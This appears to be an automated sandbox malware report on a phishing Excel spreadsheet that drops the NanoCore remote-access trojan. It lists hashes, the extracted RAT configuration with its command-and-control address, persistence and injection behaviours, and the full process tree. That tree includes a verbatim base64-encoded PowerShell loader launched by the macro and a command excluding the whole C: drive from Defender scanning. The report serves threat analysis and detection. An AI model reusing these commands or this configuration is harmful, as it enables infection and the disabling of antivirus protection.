Analysis
-
max time kernel
118s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en -
submitted
15-09-2021 06:27
Static task
static1
Behavioral task
behavioral1
Sample
New_Inquiry_andQuotation#RFQ091421B87344_Request_Samples_and_Products_NORDY.xls
Resource
win7-en
General
-
Target
New_Inquiry_andQuotation#RFQ091421B87344_Request_Samples_and_Products_NORDY.xls
-
Size
39KB
-
MD5
b003e33c743da4d4f69184e9db2c4862
-
SHA1
bb6b3cc70a7e0463bc2914e478ffa40bba1cdf69
-
SHA256
0460eaab50a96b4024770dc1a1e052132e7391007c2707a8f38eb255bbf643ac
-
SHA512
0544bae6054ba536b9027698134b15459888d6a86240966623311592c9eac2ba36664dee8725a985922deebe23d566927f37ae41c15ae2c1b46462c047220f6d
Malware Config
Extracted
nanocore
1.2.2.0
185.140.53.52:4488
f373bcfb-36f5-4636-8770-9da829010f62
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-06-03T23:05:48.798919236Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
4488
-
default_group
AUGUST
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
f373bcfb-36f5-4636-8770-9da829010f62
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
185.140.53.52
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 656 3940 cmd.exe EXCEL.EXE -
suricata: ET MALWARE Possible NanoCore C2 60B
suricata: ET MALWARE Possible NanoCore C2 60B
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
Ksbonyprod.exepid process 3136 Ksbonyprod.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
ys.exeys.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\Chromes = "\"C:\\Users\\Admin\\AppData\\Local\\Chromes.exe\"" ys.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Service = "C:\\Program Files (x86)\\SCSI Service\\scsisvc.exe" ys.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ys.exedescription pid process target process PID 3564 set thread context of 1844 3564 ys.exe ys.exe -
Drops file in Program Files directory 2 IoCs
Processes:
ys.exedescription ioc process File created C:\Program Files (x86)\SCSI Service\scsisvc.exe ys.exe File opened for modification C:\Program Files (x86)\SCSI Service\scsisvc.exe ys.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2324 schtasks.exe 3052 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
Processes:
ys.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings ys.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3940 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
powershell.exepowershell.exeys.exepowershell.exepowershell.exeys.exepid process 488 powershell.exe 488 powershell.exe 488 powershell.exe 3740 powershell.exe 3740 powershell.exe 3740 powershell.exe 3564 ys.exe 3564 ys.exe 896 powershell.exe 896 powershell.exe 308 powershell.exe 1844 ys.exe 1844 ys.exe 1844 ys.exe 896 powershell.exe 308 powershell.exe 308 powershell.exe 1844 ys.exe 1844 ys.exe 1844 ys.exe 1844 ys.exe 1844 ys.exe 1844 ys.exe 1844 ys.exe 1844 ys.exe 1844 ys.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
ys.exepid process 1844 ys.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exeys.exepowershell.exepowershell.exeKsbonyprod.exepowershell.exeys.exedescription pid process Token: SeDebugPrivilege 488 powershell.exe Token: SeDebugPrivilege 3564 ys.exe Token: SeDebugPrivilege 3740 powershell.exe Token: SeDebugPrivilege 896 powershell.exe Token: SeDebugPrivilege 3136 Ksbonyprod.exe Token: SeDebugPrivilege 308 powershell.exe Token: SeDebugPrivilege 1844 ys.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
EXCEL.EXEpid process 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeys.exeWScript.exeWScript.exeys.exeKsbonyprod.exedescription pid process target process PID 3940 wrote to memory of 656 3940 EXCEL.EXE cmd.exe PID 3940 wrote to memory of 656 3940 EXCEL.EXE cmd.exe PID 656 wrote to memory of 488 656 cmd.exe powershell.exe PID 656 wrote to memory of 488 656 cmd.exe powershell.exe PID 488 wrote to memory of 3564 488 powershell.exe ys.exe PID 488 wrote to memory of 3564 488 powershell.exe ys.exe PID 488 wrote to memory of 3564 488 powershell.exe ys.exe PID 3564 wrote to memory of 3740 3564 ys.exe powershell.exe PID 3564 wrote to memory of 3740 3564 ys.exe powershell.exe PID 3564 wrote to memory of 3740 3564 ys.exe powershell.exe PID 3564 wrote to memory of 3660 3564 ys.exe WScript.exe PID 3564 wrote to memory of 3660 3564 ys.exe WScript.exe PID 3564 wrote to memory of 3660 3564 ys.exe WScript.exe PID 3564 wrote to memory of 3832 3564 ys.exe WScript.exe PID 3564 wrote to memory of 3832 3564 ys.exe WScript.exe PID 3564 wrote to memory of 3832 3564 ys.exe WScript.exe PID 3564 wrote to memory of 1844 3564 ys.exe ys.exe PID 3564 wrote to memory of 1844 3564 ys.exe ys.exe PID 3564 wrote to memory of 1844 3564 ys.exe ys.exe PID 3564 wrote to memory of 1844 3564 ys.exe ys.exe PID 3564 wrote to memory of 1844 3564 ys.exe ys.exe PID 3564 wrote to memory of 1844 3564 ys.exe ys.exe PID 3564 wrote to memory of 1844 3564 ys.exe ys.exe PID 3564 wrote to memory of 1844 3564 ys.exe ys.exe PID 3660 wrote to memory of 896 3660 WScript.exe powershell.exe PID 3660 wrote to memory of 896 3660 WScript.exe powershell.exe PID 3660 wrote to memory of 896 3660 WScript.exe powershell.exe PID 3832 wrote to memory of 3136 3832 WScript.exe Ksbonyprod.exe PID 3832 wrote to memory of 3136 3832 WScript.exe Ksbonyprod.exe PID 3832 wrote to memory of 3136 3832 WScript.exe Ksbonyprod.exe PID 1844 wrote to memory of 2324 1844 ys.exe schtasks.exe PID 1844 wrote to memory of 2324 1844 ys.exe schtasks.exe PID 1844 wrote to memory of 2324 1844 ys.exe schtasks.exe PID 1844 wrote to memory of 3052 1844 ys.exe schtasks.exe PID 1844 wrote to memory of 3052 1844 ys.exe schtasks.exe PID 1844 wrote to memory of 3052 1844 ys.exe schtasks.exe PID 3136 wrote to memory of 308 3136 Ksbonyprod.exe powershell.exe PID 3136 wrote to memory of 308 3136 Ksbonyprod.exe powershell.exe PID 3136 wrote to memory of 308 3136 Ksbonyprod.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New_Inquiry_andQuotation#RFQ091421B87344_Request_Samples_and_Products_NORDY.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C Po^W^ERs^he^lL -E WwBTAFkAUwB0AGUAbQAuAFQARQB4AHQALgBFAE4AYwBPAGQASQBuAGcAXQA6ADoAdQBuAGkAQwBPAEQARQAuAEcARQBUAHMAdAByAGkATgBHACgAWwBTAFkAUwB0AEUATQAuAEMAbwBuAFYAZQBSAFQAXQA6ADoARgBSAE8ATQBCAGEAUwBlADYANABzAHQAcgBpAE4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEgAWQBBAGMAQQBCAHoAQQBIAGMAQQBjAEEAQgB5AEEARwBnAEEAYQBnAEIAbgBBAEcASQBBAGMAUQBCAHMAQQBIAGsAQQBlAFEAQgBsAEEASABZAEEAYwBBAEIAdQBBAEcARQBBAGQAZwBCADAAQQBIAG8AQQBkAGcAQgBpAEEASABFAEEAYQBRAEIANQBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBlAEEAQgB2AEEARwBvAEEAWgB3AEIANQBBAEcATQBBAGEAQQBCAHQAQQBHAGMAQQBaAHcAQgBrAEEAQwBBAEEATABBAEEAZwBBAEMAUQBBAGEAdwBCAHgAQQBHAGMAQQBaAHcAQgAwAEEASABvAEEAZQBnAEIAbgBBAEcASQBBAGEAQQBCAGgAQQBHAE0AQQBJAEEAQQBwAEEAQQAwAEEAQwBnAEIANwBBAEMAQQBBAFMAUQBCAHQAQQBGAEEAQQBUAHcAQgBTAEEARgBRAEEATABRAEIAdABBAEcAOABBAFoAQQBCADEAQQBHAHcAQQBSAFEAQQBnAEEARwBJAEEAUwBRAEIAVQBBAEYATQBBAFYAQQBCAFMAQQBFAEUAQQBUAGcAQgBUAEEARQBZAEEAWgBRAEIAeQBBAEQAcwBBAEQAUQBBAEsAQQBGAE0AQQBWAEEAQgBoAEEASABJAEEAVgBBAEEAdABBAEcASQBBAGEAUQBCAFUAQQBIAE0AQQBWAEEAQgB5AEEARQBFAEEAVABnAEIAVABBAEUAWQBBAFoAUQBCAHkAQQBDAEEAQQBMAFEAQgB6AEEARQA4AEEAZABRAEIAeQBBAEcATQBBAFIAUQBBAGcAQQBDAFEAQQBlAEEAQgB2AEEARwBvAEEAWgB3AEIANQBBAEcATQBBAGEAQQBCAHQAQQBHAGMAQQBaAHcAQgBrAEEAQwBBAEEATABRAEIAawBBAEUAVQBBAFUAdwBCAFUAQQBHAGsAQQBUAGcAQgBoAEEARgBRAEEAUwBRAEIAUABBAEUANABBAEkAQQBBAGsAQQBHAHMAQQBjAFEAQgBuAEEARwBjAEEAZABBAEIANgBBAEgAbwBBAFoAdwBCAGkAQQBHAGcAQQBZAFEAQgBqAEEARABzAEEASQBBAEEAbQBBAEMAQQBBAEoAQQBCAHIAQQBIAEUAQQBaAHcAQgBuAEEASABRAEEAZQBnAEIANgBBAEcAYwBBAFkAZwBCAG8AQQBHAEUAQQBZAHcAQQA3AEEAQwBBAEEAZgBRAEIAMABBAEgASQBBAGUAUQBCADcAQQBDAFEAQQBkAGcAQgBoAEEASABvAEEAZQBnAEIAcgBBAEcASQBBAGIAdwBCADIAQQBIAG8AQQBaAEEAQgA1AEEASABNAEEAWQB3AEIAcwBBAEQAMABBAEoAQQBCAEYAQQBHADQAQQBWAGcAQQA2AEEASABRAEEAUgBRAEIATgBBAEYAQQBBAEsAdwBBAG4AQQBGAHcAQQBlAFEAQgB6AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgA5AEEARwBNAEEAWQBRAEIAMABBAEcATQBBAGEAQQBCADcAQQBIADAAQQAiACkAKQB8AGkARQBYAA==2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWERshelL -E WwBTAFkAUwB0AGUAbQAuAFQARQB4AHQALgBFAE4AYwBPAGQASQBuAGcAXQA6ADoAdQBuAGkAQwBPAEQARQAuAEcARQBUAHMAdAByAGkATgBHACgAWwBTAFkAUwB0AEUATQAuAEMAbwBuAFYAZQBSAFQAXQA6ADoARgBSAE8ATQBCAGEAUwBlADYANABzAHQAcgBpAE4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEgAWQBBAGMAQQBCAHoAQQBIAGMAQQBjAEEAQgB5AEEARwBnAEEAYQBnAEIAbgBBAEcASQBBAGMAUQBCAHMAQQBIAGsAQQBlAFEAQgBsAEEASABZAEEAYwBBAEIAdQBBAEcARQBBAGQAZwBCADAAQQBIAG8AQQBkAGcAQgBpAEEASABFAEEAYQBRAEIANQBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBlAEEAQgB2AEEARwBvAEEAWgB3AEIANQBBAEcATQBBAGEAQQBCAHQAQQBHAGMAQQBaAHcAQgBrAEEAQwBBAEEATABBAEEAZwBBAEMAUQBBAGEAdwBCAHgAQQBHAGMAQQBaAHcAQgAwAEEASABvAEEAZQBnAEIAbgBBAEcASQBBAGEAQQBCAGgAQQBHAE0AQQBJAEEAQQBwAEEAQQAwAEEAQwBnAEIANwBBAEMAQQBBAFMAUQBCAHQAQQBGAEEAQQBUAHcAQgBTAEEARgBRAEEATABRAEIAdABBAEcAOABBAFoAQQBCADEAQQBHAHcAQQBSAFEAQQBnAEEARwBJAEEAUwBRAEIAVQBBAEYATQBBAFYAQQBCAFMAQQBFAEUAQQBUAGcAQgBUAEEARQBZAEEAWgBRAEIAeQBBAEQAcwBBAEQAUQBBAEsAQQBGAE0AQQBWAEEAQgBoAEEASABJAEEAVgBBAEEAdABBAEcASQBBAGEAUQBCAFUAQQBIAE0AQQBWAEEAQgB5AEEARQBFAEEAVABnAEIAVABBAEUAWQBBAFoAUQBCAHkAQQBDAEEAQQBMAFEAQgB6AEEARQA4AEEAZABRAEIAeQBBAEcATQBBAFIAUQBBAGcAQQBDAFEAQQBlAEEAQgB2AEEARwBvAEEAWgB3AEIANQBBAEcATQBBAGEAQQBCAHQAQQBHAGMAQQBaAHcAQgBrAEEAQwBBAEEATABRAEIAawBBAEUAVQBBAFUAdwBCAFUAQQBHAGsAQQBUAGcAQgBoAEEARgBRAEEAUwBRAEIAUABBAEUANABBAEkAQQBBAGsAQQBHAHMAQQBjAFEAQgBuAEEARwBjAEEAZABBAEIANgBBAEgAbwBBAFoAdwBCAGkAQQBHAGcAQQBZAFEAQgBqAEEARABzAEEASQBBAEEAbQBBAEMAQQBBAEoAQQBCAHIAQQBIAEUAQQBaAHcAQgBuAEEASABRAEEAZQBnAEIANgBBAEcAYwBBAFkAZwBCAG8AQQBHAEUAQQBZAHcAQQA3AEEAQwBBAEEAZgBRAEIAMABBAEgASQBBAGUAUQBCADcAQQBDAFEAQQBkAGcAQgBoAEEASABvAEEAZQBnAEIAcgBBAEcASQBBAGIAdwBCADIAQQBIAG8AQQBaAEEAQgA1AEEASABNAEEAWQB3AEIAcwBBAEQAMABBAEoAQQBCAEYAQQBHADQAQQBWAGcAQQA2AEEASABRAEEAUgBRAEIATgBBAEYAQQBBAEsAdwBBAG4AQQBGAHcAQQBlAFEAQgB6AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgAyAEEASABBAEEAYwB3AEIAMwBBAEgAQQBBAGMAZwBCAG8AQQBHAG8AQQBaAHcAQgBpAEEASABFAEEAYgBBAEIANQBBAEgAawBBAFoAUQBCADIAQQBIAEEAQQBiAGcAQgBoAEEASABZAEEAZABBAEIANgBBAEgAWQBBAFkAZwBCAHgAQQBHAGsAQQBlAFEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAWgBRAEIAaQBBAEcARQBBAGMAdwBCADAAQQBHAGsAQQBZAFEAQgB1AEEASABNAEEAWQB3AEIAbwBBAEcAawBBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQQB1AEEASABnAEEAZQBRAEIANgBBAEMAOABBAFEAUQBCAFYAQQBFAGMAQQBMAHcAQgBCAEEARQB3AEEAVABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABZAEEAWQBRAEIANgBBAEgAbwBBAGEAdwBCAGkAQQBHADgAQQBkAGcAQgA2AEEARwBRAEEAZQBRAEIAegBBAEcATQBBAGIAQQBBADcAQQBBADAAQQBDAGcAQgA5AEEARwBNAEEAWQBRAEIAMABBAEcATQBBAGEAQQBCADcAQQBIADAAQQAiACkAKQB8AGkARQBYAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ys.exe"C:\Users\Admin\AppData\Local\Temp\ys.exe"4⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 205⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Rlifexonjiantfxwzaeufs.vbs"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Local\Chromes.exe'6⤵
